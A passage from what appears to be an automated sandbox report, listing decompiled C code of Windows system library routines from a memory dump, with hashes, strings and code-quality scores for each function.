                                                      							_t75 = _a4;
                                                      							_t79 =  &_v352;
                                                      							E01823787(_a4,  &_v352, _t80);
                                                      						}
                                                      					}
                                                      					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                      				}
                                                      				_push(_v1156);
                                                      				E017E95D0();
                                                      				if(_t81 >= 0) {
                                                      					goto L12;
                                                      				} else {
                                                      					goto L11;
                                                      				}
                                                      			}
































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                      • Instruction ID: 6e81199075f850ea0a6526243506dd06aae851c6b65760cf5b778ba678792c9d
                                                      • Opcode Fuzzy Hash: c3da96c8cbe018e70c71837f9f771a5419d2dcca7b31338ae2f469b86fdc1288
                                                      • Instruction Fuzzy Hash: DD4143F2D0052DABDF219A54CC94F9EB7BCAB48714F0045A5EB09AB241DB349F888F95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E018705AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                      				signed int _v20;
                                                      				char _v24;
                                                      				signed int _v28;
                                                      				char _v32;
                                                      				signed int _v36;
                                                      				intOrPtr _v40;
                                                      				void* __ebx;
                                                      				void* _t35;
                                                      				signed int _t42;
                                                      				char* _t48;
                                                      				signed int _t59;
                                                      				signed char _t61;
                                                      				signed int* _t79;
                                                      				void* _t88;
                                                      
                                                      				_v28 = __edx;
                                                      				_t79 = __ecx;
                                                      				if(E018707DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                      					L13:
                                                      					_t35 = 0;
                                                      					L14:
                                                      					return _t35;
                                                      				}
                                                      				_t61 = __ecx[1];
                                                      				_t59 = __ecx[0xf];
                                                      				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                      				_v36 = _a8 << 0xc;
                                                      				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                      				asm("sbb esi, esi");
                                                      				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                      				if(_t42 != 0) {
                                                      					_push(0);
                                                      					_push(0x14);
                                                      					_push( &_v24);
                                                      					_push(3);
                                                      					_push(_t59);
                                                      					_push(0xffffffff);
                                                      					if(E017E9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                      						_push(_t61);
                                                      						E0186A80D(_t59, 1, _v20, 0);
                                                      						_t88 = 4;
                                                      					}
                                                      				}
                                                      				_t35 = E0186A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                      				if(_t35 < 0) {
                                                      					goto L14;
                                                      				}
                                                      				E01871293(_t79, _v40, E018707DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                      				if(E017C7D50() == 0) {
                                                      					_t48 = 0x7ffe0380;
                                                      				} else {
                                                      					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                      				}
                                                      				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                      					E0186138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                      				}
                                                      				goto L13;
                                                      			}


















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `
                                                      • API String ID: 0-2679148245
                                                      • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction ID: 941d4f242ee1399ef3401c2b0eaf3c48a1d8dcafa5acbacea55ff4d3b9249923
                                                      • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                      • Instruction Fuzzy Hash: 2431E47260434A6BE710DE28CD85F97BBD9EBC5754F144229FA54EB280D770EA04CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E01823884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr* _v16;
                                                      				char* _v20;
                                                      				short _v22;
                                                      				char _v24;
                                                      				intOrPtr _t38;
                                                      				short _t40;
                                                      				short _t41;
                                                      				void* _t44;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      
                                                      				_v16 = __edx;
                                                      				_t40 = 0x14;
                                                      				_v24 = _t40;
                                                      				_t41 = 0x16;
                                                      				_v22 = _t41;
                                                      				_t38 = 0;
                                                      				_v12 = __ecx;
                                                      				_push( &_v8);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(2);
                                                      				_t43 =  &_v24;
                                                      				_v20 = L"BinaryName";
                                                      				_push( &_v24);
                                                      				_push(__ecx);
                                                      				_t47 = 0;
                                                      				_t48 = E017E9650();
                                                      				if(_t48 >= 0) {
                                                      					_t48 = 0xc000090b;
                                                      				}
                                                      				if(_t48 != 0xc0000023) {
                                                      					_t44 = 0;
                                                      					L13:
                                                      					if(_t48 < 0) {
                                                      						L16:
                                                      						if(_t47 != 0) {
                                                      							L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                                      						}
                                                      						L18:
                                                      						return _t48;
                                                      					}
                                                      					 *_v16 = _t38;
                                                      					 *_a4 = _t47;
                                                      					goto L18;
                                                      				}
                                                      				_t47 = L017C4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                      				if(_t47 != 0) {
                                                      					_push( &_v8);
                                                      					_push(_v8);
                                                      					_push(_t47);
                                                      					_push(2);
                                                      					_push( &_v24);
                                                      					_push(_v12);
                                                      					_t48 = E017E9650();
                                                      					if(_t48 < 0) {
                                                      						_t44 = 0;
                                                      						goto L16;
                                                      					}
                                                      					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                                      						_t48 = 0xc000090b;
                                                      					}
                                                      					_t44 = 0;
                                                      					if(_t48 < 0) {
                                                      						goto L16;
                                                      					} else {
                                                      						_t17 = _t47 + 0xc; // 0xc
                                                      						_t38 = _t17;
                                                      						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                                      							_t48 = 0xc000090b;
                                                      						}
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      				_t48 = _t48 + 0xfffffff4;
                                                      				goto L18;
                                                      			}
















                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                      • Instruction ID: b451cf941f63bd8dad3c1e4a7a05a8f0148d930d5bd2b4dc68d66adfdfd9c67f
                                                      • Opcode Fuzzy Hash: 4d96ae4c3f6554297da9ea31e5a8273b1629eafa91d33c0936581bb79cb07b4f
                                                      • Instruction Fuzzy Hash: 9D310872A0052ABFDB16DA58C955D7BF7B4FB4AB20F014129ED04E7241D7349F40CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 33%
                                                      			E017DD294(void* __ecx, char __edx, void* __eflags) {
                                                      				signed int _v8;
                                                      				char _v52;
                                                      				signed int _v56;
                                                      				signed int _v60;
                                                      				intOrPtr _v64;
                                                      				char* _v68;
                                                      				intOrPtr _v72;
                                                      				char _v76;
                                                      				signed int _v84;
                                                      				intOrPtr _v88;
                                                      				char _v92;
                                                      				intOrPtr _v96;
                                                      				intOrPtr _v100;
                                                      				char _v104;
                                                      				char _v105;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t35;
                                                      				char _t38;
                                                      				signed int _t40;
                                                      				signed int _t44;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				void* _t55;
                                                      				void* _t61;
                                                      				intOrPtr _t62;
                                                      				void* _t64;
                                                      				signed int _t65;
                                                      				signed int _t66;
                                                      
                                                      				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                                      				_v8 =  *0x189d360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                                      				_v105 = __edx;
                                                      				_push( &_v92);
                                                      				_t52 = 0;
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push( &_v104);
                                                      				_push(0);
                                                      				_t59 = __ecx;
                                                      				_t55 = 2;
                                                      				if(E017C4120(_t55, __ecx) < 0) {
                                                      					_t35 = 0;
                                                      					L8:
                                                      					_pop(_t61);
                                                      					_pop(_t64);
                                                      					_pop(_t53);
                                                      					return E017EB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                                      				}
                                                      				_v96 = _v100;
                                                      				_t38 = _v92;
                                                      				if(_t38 != 0) {
                                                      					_v104 = _t38;
                                                      					_v100 = _v88;
                                                      					_t40 = _v84;
                                                      				} else {
                                                      					_t40 = 0;
                                                      				}
                                                      				_v72 = _t40;
                                                      				_v68 =  &_v104;
                                                      				_push( &_v52);
                                                      				_v76 = 0x18;
                                                      				_push( &_v76);
                                                      				_v64 = 0x40;
                                                      				_v60 = _t52;
                                                      				_v56 = _t52;
                                                      				_t44 = E017E98D0();
                                                      				_t62 = _v88;
                                                      				_t65 = _t44;
                                                      				if(_t62 != 0) {
                                                      					asm("lock xadd [edi], eax");
                                                      					if((_t44 | 0xffffffff) != 0) {
                                                      						goto L4;
                                                      					}
                                                      					_push( *((intOrPtr*)(_t62 + 4)));
                                                      					E017E95D0();
                                                      					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                                      					goto L4;
                                                      				} else {
                                                      					L4:
                                                      					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                                      					if(_t65 >= 0) {
                                                      						_t52 = 1;
                                                      					} else {
                                                      						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                                      							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                                      						}
                                                      					}
                                                      					_t35 = _t52;
                                                      					goto L8;
                                                      				}
                                                      			}


































                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @
                                                      • API String ID: 0-2766056989
                                                      • Opcode ID: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                      • Instruction ID: 8889d0720fbd45151f6c55a0c3ac8631bd64ed1999f8798abd504b8b0f0bdde8
                                                      • Opcode Fuzzy Hash: c1dcc62d6337c57248563ae3acb777ea3408521d82d8b92b197b04e6e96c677e
                                                      • Instruction Fuzzy Hash: C23193B2508309DFC721DF68C98495BFBF8EB99754F40092EF99583290DA34DD04CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E017B1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
                                                      				intOrPtr _v8;
                                                      				char _v16;
                                                      				intOrPtr* _t26;
                                                      				intOrPtr _t29;
                                                      				void* _t30;
                                                      				signed int _t31;
                                                      
                                                      				_t27 = __ecx;
                                                      				_t29 = __edx;
                                                      				_t31 = 0;
                                                      				_v8 = __edx;
                                                      				if(__edx == 0) {
                                                      					L18:
                                                      					_t30 = 0xc000000d;
                                                      					goto L12;
                                                      				} else {
                                                      					_t26 = _a4;
                                                      					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
                                                      						goto L18;
                                                      					} else {
                                                      						E017EBB40(__ecx,  &_v16, __ecx);
                                                      						_push(_t26);
                                                      						_push(0);
                                                      						_push(0);
                                                      						_push(_t29);
                                                      						_push( &_v16);
                                                      						_t30 = E017EA9B0();
                                                      						if(_t30 >= 0) {
                                                      							_t19 =  *_t26;
                                                      							if( *_t26 != 0) {
                                                      								goto L7;
                                                      							} else {
                                                      								 *_a8 =  *_a8 & 0;
                                                      							}
                                                      						} else {
                                                      							if(_t30 != 0xc0000023) {
                                                      								L9:
                                                      								_push(_t26);
                                                      								_push( *_t26);
                                                      								_push(_t31);
                                                      								_push(_v8);
                                                      								_push( &_v16);
                                                      								_t30 = E017EA9B0();
                                                      								if(_t30 < 0) {
                                                      									L12:
                                                      									if(_t31 != 0) {
                                                      										L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
                                                      									}
                                                      								} else {
                                                      									 *_a8 = _t31;
                                                      								}
                                                      							} else {
                                                      								_t19 =  *_t26;
                                                      								if( *_t26 == 0) {
                                                      									_t31 = 0;
                                                      								} else {
                                                      									L7:
                                                      									_t31 = L017C4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
                                                      								}
                                                      								if(_t31 == 0) {
                                                      									_t30 = 0xc0000017;
                                                      								} else {
                                                      									goto L9;
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t30;
                                                      			}










                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: WindowsExcludedProcs
                                                      • API String ID: 0-3583428290
                                                      • Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction ID: e6540ec97a217056d716bfd7644759fd354f0b692b6a0e81a69c006a977b184f
                                                      • Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
                                                      • Instruction Fuzzy Hash: 2A21F53A501229EBDB22DA59A894F9BFBADAF44B50F064465FA04DB204D730DD0097E0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E017CF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                      				intOrPtr _t13;
                                                      				intOrPtr _t14;
                                                      				signed int _t16;
                                                      				signed char _t17;
                                                      				intOrPtr _t19;
                                                      				intOrPtr _t21;
                                                      				intOrPtr _t23;
                                                      				intOrPtr* _t25;
                                                      
                                                      				_t25 = _a8;
                                                      				_t17 = __ecx;
                                                      				if(_t25 == 0) {
                                                      					_t19 = 0xc00000f2;
                                                      					L8:
                                                      					return _t19;
                                                      				}
                                                      				if((__ecx & 0xfffffffe) != 0) {
                                                      					_t19 = 0xc00000ef;
                                                      					goto L8;
                                                      				}
                                                      				_t19 = 0;
                                                      				 *_t25 = 0;
                                                      				_t21 = 0;
                                                      				_t23 = "Actx ";
                                                      				if(__edx != 0) {
                                                      					if(__edx == 0xfffffffc) {
                                                      						L21:
                                                      						_t21 = 0x200;
                                                      						L5:
                                                      						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
                                                      						 *_t25 = _t13;
                                                      						L6:
                                                      						if(_t13 == 0) {
                                                      							if((_t17 & 0x00000001) != 0) {
                                                      								 *_t25 = _t23;
                                                      							}
                                                      						}
                                                      						L7:
                                                      						goto L8;
                                                      					}
                                                      					if(__edx == 0xfffffffd) {
                                                      						 *_t25 = _t23;
                                                      						_t13 = _t23;
                                                      						goto L6;
                                                      					}
                                                      					_t13 =  *((intOrPtr*)(__edx + 0x10));
                                                      					 *_t25 = _t13;
                                                      					L14:
                                                      					if(_t21 == 0) {
                                                      						goto L6;
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				_t14 = _a4;
                                                      				if(_t14 != 0) {
                                                      					_t16 =  *(_t14 + 0x14) & 0x00000007;
                                                      					if(_t16 <= 1) {
                                                      						_t21 = 0x1f8;
                                                      						_t13 = 0;
                                                      						goto L14;
                                                      					}
                                                      					if(_t16 == 2) {
                                                      						goto L21;
                                                      					}
                                                      					if(_t16 != 4) {
                                                      						_t19 = 0xc00000f0;
                                                      						goto L7;
                                                      					}
                                                      					_t13 = 0;
                                                      					goto L6;
                                                      				} else {
                                                      					_t21 = 0x1f8;
                                                      					goto L5;
                                                      				}
                                                      			}












                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Actx
                                                      • API String ID: 0-89312691
                                                      • Opcode ID: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                      • Instruction ID: a10cd916f357f2f37276aca4c6398d5ab7d055f9061b7a2f99cb0181727621ee
                                                      • Opcode Fuzzy Hash: 4d737f819d85ed918fa636847063e6560b0e8a056d2b3ca4160f6307a6dbb73f
                                                      • Instruction Fuzzy Hash: D211B2353057028BEB254F1D8490736F69BEB95F24FB4457EE961CB791DB70C8418341
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E01858DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr _t35;
                                                      				void* _t41;
                                                      
                                                      				_t40 = __esi;
                                                      				_t39 = __edi;
                                                      				_t38 = __edx;
                                                      				_t35 = __ecx;
                                                      				_t34 = __ebx;
                                                      				_push(0x74);
                                                      				_push(0x1880d50);
                                                      				E017FD0E8(__ebx, __edi, __esi);
                                                      				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
                                                      				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
                                                      					E01835720(0x65, 0, "Critical error detected %lx\n", _t35);
                                                      					if( *((intOrPtr*)(_t41 + 8)) != 0) {
                                                      						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                      						asm("int3");
                                                      						 *(_t41 - 4) = 0xfffffffe;
                                                      					}
                                                      				}
                                                      				 *(_t41 - 4) = 1;
                                                      				 *((intOrPtr*)(_t41 - 0x70)) =  *((intOrPtr*)(_t41 - 0x74));
                                                      				 *((intOrPtr*)(_t41 - 0x6c)) = 1;
                                                      				 *(_t41 - 0x68) =  *(_t41 - 0x68) & 0x00000000;
                                                      				 *((intOrPtr*)(_t41 - 0x64)) = L017FDEF0;
                                                      				 *((intOrPtr*)(_t41 - 0x60)) = 1;
                                                      				 *((intOrPtr*)(_t41 - 0x5c)) =  *((intOrPtr*)(_t41 - 0x7c));
                                                      				_push(_t41 - 0x70);
                                                      				L017FDEF0(1, _t38);
                                                      				 *(_t41 - 4) = 0xfffffffe;
                                                      				return E017FD130(_t34, _t39, _t40);
                                                      			}






                                                      Strings
                                                      • Critical error detected %lx, xrefs: 01858E21
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Critical error detected %lx
                                                      • API String ID: 0-802127002
                                                      • Opcode ID: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                      • Instruction ID: 7817ce54be792944f44e9d106fc13819fc474aa749d1465b12a9e690f57d83f4
                                                      • Opcode Fuzzy Hash: 5b0da801c428f974a7de65e1a4726a93a3ddfe196c843f10c0e3232e6c50509f
                                                      • Instruction Fuzzy Hash: 5F117975D04348DADF25DFA9C5057DDBBB0EB05314F20421ED529AB392C3340601DF14
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Strings
                                                      • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 0183FF60
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                      • API String ID: 0-1911121157
                                                      • Opcode ID: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                      • Instruction ID: 2ad6df9e4f6cf59a6a0a3bbb5f48893083052b9e0a53c43547440bd4bef61a54
                                                      • Opcode Fuzzy Hash: 0915710a419bb21aae7d5aaa99b1567242af5ef8843c06bb3283ddba8ea9f9ca
                                                      • Instruction Fuzzy Hash: 74110071910544EFDF22EB54C848F98BBB1FF48704F188058E609AB2A1CB389B44DBD1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 88%
                                                      			E01875BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t296;
                                                      				signed char _t298;
                                                      				signed int _t301;
                                                      				signed int _t306;
                                                      				signed int _t310;
                                                      				signed char _t311;
                                                      				intOrPtr _t312;
                                                      				signed int _t313;
                                                      				void* _t327;
                                                      				signed int _t328;
                                                      				intOrPtr _t329;
                                                      				intOrPtr _t333;
                                                      				signed char _t334;
                                                      				signed int _t336;
                                                      				void* _t339;
                                                      				signed int _t340;
                                                      				signed int _t356;
                                                      				signed int _t362;
                                                      				short _t367;
                                                      				short _t368;
                                                      				short _t373;
                                                      				signed int _t380;
                                                      				void* _t382;
                                                      				short _t385;
                                                      				signed short _t392;
                                                      				signed char _t393;
                                                      				signed int _t395;
                                                      				signed char _t397;
                                                      				signed int _t398;
                                                      				signed short _t402;
                                                      				void* _t406;
                                                      				signed int _t412;
                                                      				signed char _t414;
                                                      				signed short _t416;
                                                      				signed int _t421;
                                                      				signed char _t427;
                                                      				intOrPtr _t434;
                                                      				signed char _t435;
                                                      				signed int _t436;
                                                      				signed int _t442;
                                                      				signed int _t446;
                                                      				signed int _t447;
                                                      				signed int _t451;
                                                      				signed int _t453;
                                                      				signed int _t454;
                                                      				signed int _t455;
                                                      				intOrPtr _t456;
                                                      				intOrPtr* _t457;
                                                      				short _t458;
                                                      				signed short _t462;
                                                      				signed int _t469;
                                                      				intOrPtr* _t474;
                                                      				signed int _t475;
                                                      				signed int _t479;
                                                      				signed int _t480;
                                                      				signed int _t481;
                                                      				short _t485;
                                                      				signed int _t491;
                                                      				signed int* _t494;
                                                      				signed int _t498;
                                                      				signed int _t505;
                                                      				intOrPtr _t506;
                                                      				signed short _t508;
                                                      				signed int _t511;
                                                      				void* _t517;
                                                      				signed int _t519;
                                                      				signed int _t522;
                                                      				void* _t523;
                                                      				signed int _t524;
                                                      				void* _t528;
                                                      				signed int _t529;
                                                      
                                                      				_push(0xd4);
                                                      				_push(0x1881178);
                                                      				E017FD0E8(__ebx, __edi, __esi);
                                                      				_t494 = __edx;
                                                      				 *(_t528 - 0xcc) = __edx;
                                                      				_t511 = __ecx;
                                                      				 *((intOrPtr*)(_t528 - 0xb4)) = __ecx;
                                                      				 *(_t528 - 0xbc) = __ecx;
                                                      				 *((intOrPtr*)(_t528 - 0xc8)) =  *((intOrPtr*)(_t528 + 0x20));
                                                      				_t434 =  *((intOrPtr*)(_t528 + 0x24));
                                                      				 *((intOrPtr*)(_t528 - 0xc4)) = _t434;
                                                      				_t427 = 0;
                                                      				 *(_t528 - 0x74) = 0;
                                                      				 *(_t528 - 0x9c) = 0;
                                                      				 *(_t528 - 0x84) = 0;
                                                      				 *(_t528 - 0xac) = 0;
                                                      				 *(_t528 - 0x88) = 0;
                                                      				 *(_t528 - 0xa8) = 0;
                                                      				 *((intOrPtr*)(_t434 + 0x40)) = 0;
                                                      				if( *(_t528 + 0x1c) <= 0x80) {
                                                      					__eflags =  *(__ecx + 0xc0) & 0x00000004;
                                                      					if(__eflags != 0) {
                                                      						_t421 = E01874C56(0, __edx, __ecx, __eflags);
                                                      						__eflags = _t421;
                                                      						if(_t421 != 0) {
                                                      							 *((intOrPtr*)(_t528 - 4)) = 0;
                                                      							E017ED000(0x410);
                                                      							 *(_t528 - 0x18) = _t529;
                                                      							 *(_t528 - 0x9c) = _t529;
                                                      							 *((intOrPtr*)(_t528 - 4)) = 0xfffffffe;
                                                      							E01875542(_t528 - 0x9c, _t528 - 0x84);
                                                      						}
                                                      					}
                                                      					_t435 = _t427;
                                                      					 *(_t528 - 0xd0) = _t435;
                                                      					_t474 = _t511 + 0x65;
                                                      					 *((intOrPtr*)(_t528 - 0x94)) = _t474;
                                                      					_t511 = 0x18;
                                                      					while(1) {
                                                      						 *(_t528 - 0xa0) = _t427;
                                                      						 *(_t528 - 0xbc) = _t427;
                                                      						 *(_t528 - 0x80) = _t427;
                                                      						 *(_t528 - 0x78) = 0x50;
                                                      						 *(_t528 - 0x79) = _t427;
                                                      						 *(_t528 - 0x7a) = _t427;
                                                      						 *(_t528 - 0x8c) = _t427;
                                                      						 *(_t528 - 0x98) = _t427;
                                                      						 *(_t528 - 0x90) = _t427;
                                                      						 *(_t528 - 0xb0) = _t427;
                                                      						 *(_t528 - 0xb8) = _t427;
                                                      						_t296 = 1 << _t435;
                                                      						_t436 =  *(_t528 + 0xc) & 0x0000ffff;
                                                      						__eflags = _t436 & _t296;
                                                      						if((_t436 & _t296) != 0) {
                                                      							goto L92;
                                                      						}
                                                      						__eflags =  *((char*)(_t474 - 1));
                                                      						if( *((char*)(_t474 - 1)) == 0) {
                                                      							goto L92;
                                                      						}
                                                      						_t301 =  *_t474;
                                                      						__eflags = _t494[1] - _t301;
                                                      						if(_t494[1] <= _t301) {
                                                      							L10:
                                                      							__eflags =  *(_t474 - 5) & 0x00000040;
                                                      							if(( *(_t474 - 5) & 0x00000040) == 0) {
                                                      								L12:
                                                      								__eflags =  *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3];
                                                      								if(( *(_t474 - 0xd) & _t494[2] |  *(_t474 - 9) & _t494[3]) == 0) {
                                                      									goto L92;
                                                      								}
                                                      								_t442 =  *(_t474 - 0x11) & _t494[3];
                                                      								__eflags = ( *(_t474 - 0x15) & _t494[2]) -  *(_t474 - 0x15);
                                                      								if(( *(_t474 - 0x15) & _t494[2]) !=  *(_t474 - 0x15)) {
                                                      									goto L92;
                                                      								}
                                                      								__eflags = _t442 -  *(_t474 - 0x11);
                                                      								if(_t442 !=  *(_t474 - 0x11)) {
                                                      									goto L92;
                                                      								}
                                                      								L15:
                                                      								_t306 =  *(_t474 + 1) & 0x000000ff;
                                                      								 *(_t528 - 0xc0) = _t306;
                                                      								 *(_t528 - 0xa4) = _t306;
                                                      								__eflags =  *0x18960e8;
                                                      								if( *0x18960e8 != 0) {
                                                      									__eflags = _t306 - 0x40;
                                                      									if(_t306 < 0x40) {
                                                      										L20:
                                                      										asm("lock inc dword [eax]");
                                                      										_t310 =  *0x18960e8; // 0x0
                                                      										_t311 =  *(_t310 +  *(_t528 - 0xa4) * 8);
                                                      										__eflags = _t311 & 0x00000001;
                                                      										if((_t311 & 0x00000001) == 0) {
                                                      											 *(_t528 - 0xa0) = _t311;
                                                      											_t475 = _t427;
                                                      											 *(_t528 - 0x74) = _t427;
                                                      											__eflags = _t475;
                                                      											if(_t475 != 0) {
                                                      												L91:
                                                      												_t474 =  *((intOrPtr*)(_t528 - 0x94));
                                                      												goto L92;
                                                      											}
                                                      											asm("sbb edi, edi");
                                                      											_t498 = ( ~( *(_t528 + 0x18)) & _t511) + 0x50;
                                                      											_t511 = _t498;
                                                      											_t312 =  *((intOrPtr*)(_t528 - 0x94));
                                                      											__eflags =  *(_t312 - 5) & 1;
                                                      											if(( *(_t312 - 5) & 1) != 0) {
                                                      												_push(_t528 - 0x98);
                                                      												_push(0x4c);
                                                      												_push(_t528 - 0x70);
                                                      												_push(1);
                                                      												_push(0xfffffffa);
                                                      												_t412 = E017E9710();
                                                      												_t475 = _t427;
                                                      												__eflags = _t412;
                                                      												if(_t412 >= 0) {
                                                      													_t414 =  *(_t528 - 0x98) - 8;
                                                      													 *(_t528 - 0x98) = _t414;
                                                      													_t416 = _t414 + 0x0000000f & 0x0000fff8;
                                                      													 *(_t528 - 0x8c) = _t416;
                                                      													 *(_t528 - 0x79) = 1;
                                                      													_t511 = (_t416 & 0x0000ffff) + _t498;
                                                      													__eflags = _t511;
                                                      												}
                                                      											}
                                                      											_t446 =  *( *((intOrPtr*)(_t528 - 0x94)) - 5);
                                                      											__eflags = _t446 & 0x00000004;
                                                      											if((_t446 & 0x00000004) != 0) {
                                                      												__eflags =  *(_t528 - 0x9c);
                                                      												if( *(_t528 - 0x9c) != 0) {
                                                      													 *(_t528 - 0x7a) = 1;
                                                      													_t511 = _t511 + ( *(_t528 - 0x84) & 0x0000ffff);
                                                      													__eflags = _t511;
                                                      												}
                                                      											}
                                                      											_t313 = 2;
                                                      											_t447 = _t446 & _t313;
                                                      											__eflags = _t447;
                                                      											 *(_t528 - 0xd4) = _t447;
                                                      											if(_t447 != 0) {
                                                      												_t406 = 0x10;
                                                      												_t511 = _t511 + _t406;
                                                      												__eflags = _t511;
                                                      											}
                                                      											_t494 = ( *( *((intOrPtr*)(_t528 - 0xc4)) + 0x40) << 4) +  *((intOrPtr*)(_t528 - 0xc4));
                                                      											 *(_t528 - 0x88) = _t427;
                                                      											__eflags =  *(_t528 + 0x1c);
